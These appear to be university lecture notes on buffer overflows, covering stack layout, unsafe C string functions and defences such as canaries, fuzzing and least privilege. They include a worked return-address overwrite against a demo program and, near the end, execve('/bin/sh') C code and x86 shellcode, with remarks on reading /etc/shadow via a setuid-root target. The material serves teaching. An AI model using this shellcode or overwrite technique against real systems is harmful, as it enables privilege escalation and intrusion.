Week 5b
Buffer overflows
What is a buffer?
What is a buffer overflow?
What are buffer overflow attacks?
How can buffer overflows be exploited?
Examples of buffer overflow attacks.
How can we prevent buffer overflows?
In computer programming, a ‘buffer’ is a memory location where
data is stored.
A variable has room for one instance of data.
So if the variable is of type ‘int’, it will hold only one integer.
int z
char y
float x
struct Student {
    char name[8];
    int sNumber;
};
Student aRec;
[Figure: aRec laid out in memory as name followed by sNumber]
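#include <cstring>
#include <iostream>
using namespace std;

struct Student {
    char name[8];
    int sNumber;
};

int main()
{
    Student aRec, bRec;
    aRec.sNumber = 1234567;
    strcpy(aRec.name, "david");
    bRec.sNumber = 1234568;
    strcpy(bRec.name, "alexander"); // 10 bytes with the null: overflows name[8] into sNumber
    // bRec.sNumber = 1234568;
    cout << "Student name: " << aRec.name << "\nStudent number: " << aRec.sNumber << endl;
    cout << "Student name: " << bRec.name << "\nStudent number: " << bRec.sNumber << endl;
}

The output:
Student name: david
Student number: 1234567
Student name: alexander
Student number: 1912657544 (or 1179762 or ...)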
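The corrupted student number can be reproduced without relying on undefined behaviour. The sketch below simulates the copy on a raw byte image of the record. It assumes that sNumber is a 4-byte integer placed directly after the 8-byte name; the function name and constants are hypothetical and are not part of the lecture code.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>

// Assumed layout: 8 bytes of name followed directly by a 4-byte sNumber.
constexpr std::size_t kNameSize = 8;
constexpr std::size_t kRecordSize = kNameSize + sizeof(std::int32_t);

// Simulates strcpy(rec.name, text) on a byte image of the record and returns
// the value sNumber holds afterwards. The copy is capped at the record size
// so that the simulation itself never writes out of bounds.
std::int32_t number_after_copy(std::int32_t sNumber, const char *text)
{
    unsigned char record[kRecordSize] = {};
    std::memcpy(record + kNameSize, &sNumber, sizeof sNumber);

    std::size_t n = std::strlen(text) + 1; // strcpy also copies the terminating null
    if (n > kRecordSize) n = kRecordSize;
    std::memcpy(record, text, n);

    std::int32_t result;
    std::memcpy(&result, record + kNameSize, sizeof result);
    return result;
}
```

With "david" the number is untouched. With "alexander" the trailing 'r' (0x72) and the null land in the first two bytes of sNumber: on a little-endian machine 0x0012D688 becomes 0x00120072 = 1179762, and on a big-endian machine it becomes 0x7200D688 = 1912657544, which may be where the two values quoted in the output come from.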
Buffer overflow attacks exploit buffer overflows in the code.
Buffer overflow attacks can:
Cause a denial of service, which is an attack against availability:
resources that should be available to legitimate users are not.
Run arbitrary code that either modifies data, which is an attack against
integrity, or reads sensitive information, which is an attack against
confidentiality.
In some cases, an attacker tries to exploit programs that
are running under a privileged account, such as root or a
domain administrator.
They use those privileges to reach and attack areas they
themselves wouldn’t normally have access to.
1988: Morris worm: Included exploiting a buffer overflow in fingerd.
2000: Buffer overflow attack against Microsoft Outlook.
2001: Code Red worm: Exploits buffer overflow in Microsoft IIS 5.0.
2003: Slammer worm: Exploits buffer overflow in Microsoft SQL Server
2000.
2004: Sasser worm: Exploits buffer overflow in Microsoft Windows
2000/XP Local Security Authority Subsystem Service.
2005: Symantec anti-virus buffer overflow.
Why does this matter?
They design security systems!
Look at 5a_Buffer-OverFlow-MostCommon.pdf.
Buffer overflows are possible because of the way memory and
memory management work, or don’t.
In C/C++ memory management is partly the responsibility of the programmer.
In languages like Java and C# it isn’t.
The Stack contains stack frames associated with running function calls.
– Frames contain information like the return address, local variables
and function arguments.
– Stack memory grows down.
Heap memory is requested by programs for use in dynamic
data structures (new and new[]).
– Heap memory grows up.
Buffer overflow type attacks are also possible against global
data and the heap, but we won’t look at these.
The ordering of high to low memory addresses differs in some implementations.
[Figure: [SB18] Fig 10.4, process memory layout. From memory top to memory bottom: kernel code and data, stack, spare memory, heap, global data, program machine code, process control block.]
A CPU has a limited number of registers – special memory locations for
“moving” and storing data.
The stack is where we can store variables that are local to
procedures that do not fit in registers, such as local arrays or
structures.
There is a stack pointer that points to the most recently allocated
address in the stack, that is the top of the stack, which is actually
lower in memory.
Variables declared on the stack are located next to the return address
for the function's caller. The return address is the memory location
where control should return to once a function is completed.
Look at 5a_Stack-INFO.pdf, some assembler required in places.
The calling function P
1. Pushes the parameters for the called function onto the
stack
2. Executes the call instruction to call the target function Q,
which pushes the return address onto the stack
The called function Q
3. Pushes the current frame pointer value (which points to the
calling routine’s stack frame) onto the stack
4. Sets the frame pointer to be the current stack pointer value,
which now identifies the new stack frame location for the
called function
5. Allocates space for local variables by moving the stack
pointer down to leave sufficient room for them
6. Runs the body of the called function
7. As it exits it first sets the stack pointer back to the value of
the frame pointer (effectively discarding the space used by
local variables)
8. Pops the old frame pointer value (restoring the link to the
calling routine’s stack frame)
9. Executes the return instruction which pops the saved
address off the stack and returns control to the calling
function
([SB18], Figure 10.3)
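The call and return steps above can be traced with a toy model. This is only a sketch: the Machine type, its 64-word memory and the enter/leave helpers are hypothetical names introduced here, the stack is modelled as an array of 32-bit words that grows towards lower indices, and step 6 (the function body) is left to the caller of the helpers.

```cpp
#include <array>
#include <cstddef>
#include <cstdint>

// Toy machine: memory is an array of words and the stack grows downwards.
struct Machine {
    std::array<std::uint32_t, 64> mem{};
    std::size_t sp = 64; // index of the most recently pushed word (64 = empty)
    std::size_t fp = 64; // frame pointer of the currently running function
    std::uint32_t pc = 0; // where execution continues after a return

    void push(std::uint32_t v) { mem[--sp] = v; }
    std::uint32_t pop() { return mem[sp++]; }
};

// Steps 1 to 5: build the stack frame for a call with one parameter.
void enter(Machine &m, std::uint32_t arg, std::uint32_t return_address,
           std::size_t locals)
{
    m.push(arg);                              // 1. caller pushes the parameter
    m.push(return_address);                   // 2. call pushes the return address
    m.push(static_cast<std::uint32_t>(m.fp)); // 3. callee saves the old frame pointer
    m.fp = m.sp;                              // 4. frame pointer = stack pointer
    m.sp -= locals;                           // 5. leave room for local variables
}

// Steps 7 to 9: tear the frame down and return.
void leave(Machine &m)
{
    m.sp = m.fp;    // 7. discard the local variables
    m.fp = m.pop(); // 8. restore the caller's frame pointer
    m.pc = m.pop(); // 9. pop the saved return address into the program counter
}
```

After enter(m, arg, ret, 4) the four local words sit at m.mem[m.sp] to m.mem[m.sp + 3], the saved frame pointer at m.mem[m.sp + 4] and the return address at m.mem[m.sp + 5]. Writing one word too many past the locals clobbers the saved frame pointer, and one more changes where leave() sends control.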
Consider that we have this code:
Consider now that we have:
void function (const char *str)
{
    char buffer[16];
    strcpy(buffer, str); // no bounds check: writes past the end of buffer
}
int main () {
    const char *str = "I am greater than 16 bytes";
    function (str);
}
The overwritten return address could point to the address of a function
that we can run with the program’s permissions.
Remember we talked earlier about the setuid issue in Unix.
But such code might not exist!
So, we could write it ourselves and place the code we want to
execute in the buffer's overflowing area!
We will look at an example of this at the end of this section of
notes.
We then overwrite the return address so it points back to the buffer
and executes the intended code. Such code can be inserted into the
program using environment variables or program input parameters.
Causing stack overflows is often referred to as smashing the stack.
We talked earlier about the types of things an attacker can do through
a buffer overflow attack.
We can explain in a little more detail now.
Standard C library functions that perform no bounds checking include:
gets(char *str);
sprintf(char *str, char *format, …);
strcat(char *dest, char *src);
strcpy(char *dest, char *src);
vsprintf(char *str, char *fmt, va_list ap);
Functions such as strncat or strncpy are better, because they take a bound, which makes it
easier to protect against overflow.
They still need to be used with care though: they make checking easier, but they can still
overflow the buffer if the bound is specified incorrectly.
You also have to make sure that no buffer overflows are introduced by your own code, or by
other code you have included, apart from the standard libraries.
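As a minimal sketch of using strncpy with care, the helper below passes the destination size explicitly and terminates the result itself, since strncpy does not write a null when the source is too long. The name bounded_copy and its return convention are assumptions made for this example, not a standard library function.

```cpp
#include <cstddef>
#include <cstring>

// Copies src into dest, which has room for dest_size bytes, and always
// null-terminates the result. Returns false if src had to be truncated.
bool bounded_copy(char *dest, std::size_t dest_size, const char *src)
{
    if (dest_size == 0) return false;       // nowhere to put even the null
    std::strncpy(dest, src, dest_size - 1); // copy at most dest_size - 1 characters
    dest[dest_size - 1] = '\0';             // strncpy does not terminate a truncated copy
    return std::strlen(src) < dest_size;
}
```

Called as bounded_copy(buffer, sizeof buffer, str) with a 16-byte buffer, a string longer than 15 characters is cut short rather than written past the end. The bound only helps if it really is the size of the destination: passing the length of the source instead would reintroduce the overflow.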
/*
StackOverrun.cpp
This program shows an example of how a stack-based buffer
overrun can be used to execute arbitrary code. Its objective is
to find an input string that executes the function Y.
*/
F:\Examples\StackOverrun Hello
Address of X = 004012B8
Address of Y = 00401328
Hello
My stack looks like:    Now the stack looks like:
7FFDF000                0022FF30
00000018                00000018
00000001                00000001
0023FF14                0023FF14
0000000C                0000000C
0023FFE0                6C6C6548    Hello was copied in:
77C35C94                77C3006F    6C-l, 65-e, 48-H, 6F-o
77C146F0                77C146E0
FFFFFFFF                FFFFFFFF
0023FF60                0022FF60
00401401                00401401    The return address of X
00032593                00032593
00401328                00401328
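The way "Hello" shows up as 6C6C6548 and 77C3006F follows from little-endian byte order: the first character goes into the lowest byte of the first word. The sketch below overlays bytes onto 32-bit words in that order; overlay_bytes is a hypothetical helper written for this illustration and is not taken from StackOverrun.cpp.

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>

// Overlays len bytes onto a run of 32-bit words, lowest-addressed byte first,
// the way a little-endian x86 machine stores a copied string.
std::vector<std::uint32_t> overlay_bytes(std::vector<std::uint32_t> words,
                                         const unsigned char *bytes,
                                         std::size_t len)
{
    for (std::size_t i = 0; i < len && i / 4 < words.size(); ++i) {
        const unsigned shift = 8 * (i % 4);  // byte position inside the word
        std::uint32_t &w = words[i / 4];
        w = (w & ~(std::uint32_t{0xFF} << shift))  // clear the old byte
            | (std::uint32_t{bytes[i]} << shift);  // drop in the new one
    }
    return words;
}
```

Overlaying the six bytes of "Hello" (five characters plus the null) onto the words 0023FFE0 and 77C35C94 yields 6C6C6548 and 77C3006F, matching the dump: the second word keeps its upper half, 77C3, because only its two low bytes were written.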
F:\Examples\StackOverrun AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Address of X = 004012B8
Address of Y = 00401328 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
My stack looks like: Now the stack looks like:
7FFDF000 0023FF30
00000018 00000018
00000001 00000001
0023FF14 0023FF14
0000000C 0000000C
0023FFE0 41414141
77C35C94 41414141
77C146F0 41414141
FFFFFFFF 41414141
0023FF60 41414141
00401401 41414141
00032593 41414141
00401328 41414141
Trying to access 41414141
F:\Examples\StackOverrun AAAAAAAAAA
Address of X = 004012B8
Address of Y = 00401328
AAAAAAAAAA
My stack looks like: Now the stack looks like:
7FFDF000 0023FF30
00000018 00000018
00000001 00000001
0023FF14 0023FF14
0000000C 0000000C
0023FFE0 41414141
77C35C94 41414141
77C146F0 77004141 Notice the 00 for the null.
FFFFFFFF FFFFFFFF
0023FF60 0023FF60
00401401 00401401
00032593 00032593
00401328 00401328
F:\Examples\StackOverrun AAAAAAAAAAAAAAAAAAAA
Address of X = 004012B8
Address of Y = 00401328 AAAAAAAAAAAAAAAAAAAA
My stack looks like: Now the stack looks like:
7FFDF000 0023FF30
00000018 00000018
00000001 00000001
0023FF14 0023FF14
0000000C 0000000C
0023FFE0 41414141
77C35C94 41414141
77C146F0 41414141
FFFFFFFF 41414141
0023FF60 41414141
00401401 00401400
00032593 00032593
00401328 00401328
F:\Examples\StackOverrun AAAAAAAAAAAAAAAAAAAAA
Address of X = 004012B8
Address of Y = 00401328 AAAAAAAAAAAAAAAAAAAA
My stack looks like: Now the stack looks like:
7FFDC000 0023FF30
00000018 00000018
00000001 00000001
0023FF14 0023FF14
0000000C 0000000C
0023FFE0 41414141
77C35C94 41414141
77C146F0 41414141
FFFFFFFF 41414141
0023FF60 41414141
00401401 00400041
00032593 00032593
00401328 00401328
Address of X = 004012B8
Address of Y = 00401328 AAAAAAAAAAAAAAAAAAAA(‼@
My stack looks like: Now the stack looks like:
7FFDF000 0022FF30
00000018 0000001A
00000001 00000001
0022FF14 0022FF14
0000000C 0000000C
0022FFE0 41414141
77C35C94 41414141
77C146F0 41414141
FFFFFFFF 41414141
0022FF60 41414141
00401401 00401328
003E2593 003E2593
00401328 00401328
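The last input above is 20 filler characters followed by the bytes of Y's address in little-endian order. A sketch of how such an input string might be assembled is shown below; build_input is a hypothetical helper, and the 20-byte distance to the return address is simply read off the dumps above rather than computed.

```cpp
#include <cstddef>
#include <cstdint>
#include <string>

// Builds filler 'A' characters followed by the bytes of target, least
// significant byte first. Stops at the first zero byte, because a
// strcpy-style copy stops there and writes the terminating null itself.
std::string build_input(std::size_t filler, std::uint32_t target)
{
    std::string s(filler, 'A');
    for (int i = 0; i < 4; ++i) {
        const char b = static_cast<char>((target >> (8 * i)) & 0xFF);
        if (b == '\0') break;
        s.push_back(b);
    }
    return s;
}
```

For build_input(20, 0x00401328) the three appended bytes are 0x28, 0x13 and 0x40, which a Windows console displays as "(‼@". The top byte of the address is 00, and it is supplied by the string's own terminating null, which is why the return address becomes exactly 00401328.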
Buffer overflow vulnerabilities are inherent in code, due
to poor or no error checking.
There are two sides to addressing this:
If you are the developer, you need to make sure you have secure
code.
If you are a user of software, anything that can be done to
protect against buffer overflows must be done external to the
software application, unless you have the source code and can
re-code the application correctly.
Most users wouldn’t be able to make the latter choice.
Dilbert: 14-Aug-2012
Write secure code:
Buffer overflows result when more information is placed into a buffer
than it is meant to hold.
C library functions such as strcpy(), strcat(), sprintf() and
vsprintf() operate on null terminated character arrays and perform no
bounds checking.
gets() is another function that reads user input (into a buffer) from stdin until a
terminating newline or EOF is found.
The scanf() family of functions may also result in buffer overflows.
The best way to deal with buffer overflow problems is to not allow
them to occur in the first place. Developers should learn to minimize
the use of vulnerable functions.
Use compiler tools:
Compilers have become more and more aggressive in optimizations
and the checks they perform.
Some compiler tools offer warnings on the use of unsafe constructs
such as gets(), strcpy() and the like.
Some compilers (such as StackGuard, a modification of the
standard GNU C compiler gcc) actually change the compiled code
from unsafe to safe automatically, possibly by adding a canary value.
This is something you could do yourself anyway.
You can use a canary or guard value just before the return
address, and check that it hasn’t changed.
The canary value shouldn’t be predictable, or the attacker just writes it
again.
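The canary idea can be sketched on a simulated stack frame. The layout below (a 16-byte buffer, then a 4-byte canary, then a 4-byte return address) and all of the names are assumptions made for this illustration. A compiler-inserted canary works on the real stack, and the caller here is expected to pass an unpredictable canary value.

```cpp
#include <array>
#include <cstddef>
#include <cstdint>
#include <cstring>

constexpr std::size_t kBufferSize = 16;
constexpr std::size_t kCanaryOffset = kBufferSize;       // canary sits just above the buffer
constexpr std::size_t kReturnOffset = kCanaryOffset + 4; // return address above the canary
using Frame = std::array<unsigned char, kReturnOffset + 4>;

// Plants the canary, then copies input into the frame with no check against
// kBufferSize (only against the frame itself, so the simulation stays well
// defined). Returns true if the canary is still intact afterwards.
bool copy_and_check(Frame &frame, std::uint32_t canary, const char *input)
{
    std::memcpy(frame.data() + kCanaryOffset, &canary, sizeof canary);

    std::size_t n = std::strlen(input) + 1; // the copy includes the null
    if (n > frame.size()) n = frame.size();
    std::memcpy(frame.data(), input, n);    // the "unsafe" copy

    std::uint32_t seen;
    std::memcpy(&seen, frame.data() + kCanaryOffset, sizeof seen);
    return seen == canary; // false means the function must not return normally
}
```

Any write that reaches the return address from the buffer has to pass through the canary first, so a changed canary signals that the frame can no longer be trusted. If the attacker can guess the value, they can write the same bytes back and the check passes.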
Figure 16 in Goodrich & Tamassia’s book
Perform extensive code reviews of string functionality and
indexes utilized within your application.
Use something like the <strsafe.h> library of Visual
C++.
This library has buffer overrun safe functions that will help with
the detection of buffer overflows.
Stack (and/or heap) randomisation may be available!
We will see later that this is used in some Windows OS’s.
Remove the vulnerable software:
This is a simple way of protecting against being attacked through
that software.
The software may well be installed by default and not used.
For security and space/efficiency reasons it may as well be removed.
Any services or ports which are unnecessarily in operation should
be closed.
From the point of view of security it is better to know
exactly what is installed and what it is for. That is, have a
“default not install” policy.
Run Software at the Least Privilege Required:
This is another general rule: the principle of least privilege.
Applying this we limit the access an attacker can have, even if they
identify a way of launching a buffer overflow attack, or some other
attack.
Apply vendor patches:
Usually the announcement of a buffer overrun vulnerability will be
fairly closely followed by the vendor releasing a patch or updating
the software to a new version.
In either case, the vendor usually adds the proper error checking into
the program. By far, this is the best way to defend against a buffer
overrun.
Filter Specific Traffic at the Firewall:
Many companies are concerned about external attackers
breaching their company’s security via the Internet and
compromising a machine using a buffer overrun attack.
An easy preventative mechanism is to block the traffic of the
vulnerable software at the firewall.
If a company does not have internal firewalls, this does not
prevent an insider from launching a buffer overrun attack
against a specific system.
Test Key Applications:
A good way to defend against buffer overflow attacks is to be proactive and
test software.
Since it might be time consuming, test the critical software first.
Type 200 characters for a username.
What happens?
Buffer overflow problems may be around for a long time before anyone,
with good or bad motivation, tests for them.
We expect buffer overflows to result from exceptional behaviour, not normal behaviour.
One way of testing for the response to exceptional
behaviour is to use fuzzing.
This uses randomly generated data, maybe within some
bounds, as input.
Inevitably most of the input is not going to be consistent with the
expected input, and it allows us to identify some problems.
Problems like buffer overflows, which can occur with a wide range
of inputs, are likely to be found. Problems that only occur when we
have a rare combination of inputs are unlikely to be
detected.
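A very small fuzzing loop might look like the sketch below. The function under test, accept_username, and its 15-character limit are hypothetical stand-ins; the fuzzer feeds it random byte strings and counts how often an over-long input was accepted. A real fuzzer would usually watch for crashes or memory errors in the target rather than check a single rule.

```cpp
#include <cstddef>
#include <random>
#include <string>

constexpr std::size_t kMaxName = 15; // assumed limit for this example

// Hypothetical function under test: accepts names of 1 to kMaxName bytes.
bool accept_username(const std::string &name)
{
    return !name.empty() && name.size() <= kMaxName;
}

// Feeds rounds random byte strings of length 0..max_len to target and counts
// how many over-long inputs it wrongly accepted.
std::size_t count_violations(bool (*target)(const std::string &),
                             std::size_t rounds, std::size_t max_len,
                             unsigned seed)
{
    std::mt19937 rng(seed); // fixed seed keeps a failing run reproducible
    std::uniform_int_distribution<std::size_t> length(0, max_len);
    std::uniform_int_distribution<int> byte(0, 255);

    std::size_t violations = 0;
    for (std::size_t i = 0; i < rounds; ++i) {
        std::string input(length(rng), '\0');
        for (char &c : input) c = static_cast<char>(byte(rng));
        if (target(input) && input.size() > kMaxName) ++violations;
    }
    return violations;
}
```

Calling count_violations(accept_username, 1000, 200, 1) exercises the 200-character case many times over. As the text notes, this kind of random input finds problems that a wide range of inputs will trigger, but it is unlikely to stumble on one that needs a specific rare combination.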
We could use something like “strings” from
Lecture of Week 2 as a simple check of
whether unsafe functions are being used.
… obviously every programmer working on major projects now knows
about buffer overflow problems and avoids them.
Yeah, right!
Actually avoiding them isn’t as easy as it looks.
https://www.kb.cert.org/vuls/html/search
Across many different operating systems and deployment environments.
Even experts make mistakes sometimes.
When cryptographic algorithms are published and released for testing, a
reference implementation is often made available too.
The reference implementation for MD6, a hash function, was found, in December
2008, to contain a buffer overflow.
Remember I said earlier about inserting your own code into the
buffer.
This is called shellcoding.
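5a_Shell.cpp: this will open a shell.
#include <unistd.h> // execve
int main(int argc, char *argv[])
{
    char sh[] = "/bin/sh";  // program to run
    char *args[2];
    args[0] = sh;           // argv[0] is the program name
    args[1] = NULL;         // argument list ends with NULL
    execve(sh, args, NULL); // replace this process with the shell
}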
Remember the setuid issue!
If the program which this buffer overflow attack is
launched against is owned by root and is a setuid
program, then the shell will run with root permissions.
This means that when we attack we can also include
instructions to, for example, view /etc/shadow,
and we will be able to.
So the attacker submits the input that overflows the buffer,
followed by the instructions to run in the shell.
5a_x86code.txt
nop
nop // end of nop sled
jmp find // jump to end of code
cont: pop %esi // pop address of sh off stack into %esi
xor %eax, %eax // zero contents of EAX
mov %al, 0x7(%esi) // copy zero byte to end of string sh (%esi)
lea (%esi), %ebx // load address of sh (%esi) into %ebx
mov %ebx,0x8(%esi) // save address of sh in args[0] (%esi+8)
mov %eax,0xc(%esi) // copy zero to args[1] (esi+c)
mov $0xb,%al // copy execve syscall number (11) to %al
mov %esi,%ebx // copy address of sh (%esi) into %ebx
lea 0x8(%esi),%ecx // copy address of args (%esi+8) to %ecx
lea 0xc(%esi),%edx // copy address of args[1] (%esi+c) to %edx
int $0x80 // software interrupt to execute syscall
find: call cont // call cont which saves next address on stack
sh: .string "/bin/sh " // string constant
args: .long 0 // space used for args array
.long 0 // args[1] and also NULL for env array
Fig 10.11(a) in [SB18]
The address is
0x080497b8